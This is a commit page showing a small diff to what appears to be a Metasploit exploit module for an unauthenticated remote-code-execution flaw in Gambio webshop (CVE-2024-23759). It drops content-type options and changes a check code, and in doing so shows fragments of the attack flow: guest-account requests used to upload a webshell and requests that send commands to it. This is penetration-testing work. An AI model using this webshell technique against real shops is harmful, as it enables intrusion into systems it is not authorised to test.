update addressing cdelafuente-r7 comments

rapid7 · Mar 28, 2024 · 9f50f12 · 9f50f12
1 parent 4546fd1
commit 9f50f12
Showing 1 changed file with 1 addition and 5 deletions.
diff --git a/modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb b/modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb
@@ -102,7 +102,6 @@ def execute_php(cmd, _opts = {})
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, @webshell_name),
-      'ctype' => 'application/x-www-form-urlencoded',
       'vars_post' => {
         @post_param => payload
       }
@@ -115,7 +114,6 @@ def execute_command(cmd, _opts = {})
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, @webshell_name),
-      'ctype' => 'application/x-www-form-urlencoded',
       'vars_get' => {
         @get_param => php_cmd_function
       },
@@ -158,7 +156,6 @@ def upload_webshell
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'shop.php?do=CreateGuest/Proceed'),
-      'ctype' => 'application/x-www-form-urlencoded',
       'keep_cookies' => true,
       'vars_post' => {
         'firstname' => firstname,
@@ -181,7 +178,6 @@ def upload_webshell
       res = send_request_cgi({
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path, 'shop.php?do=Parcelshopfinder/AddAddressBookEntry'),
-        'ctype' => 'application/x-www-form-urlencoded',
         'keep_cookies' => true,
         'vars_post' => {
           'checkout_started' => 0,
@@ -215,7 +211,7 @@ def check
     # Search for "Gambio" on the login page
     return CheckCode::Safe unless res.body.include?('gambio')
 
-    CheckCode::Appears('It looks like Gambio Webshop is running.')
+    CheckCode::Detected('It looks like Gambio Webshop is running.')
   end
 
   def exploit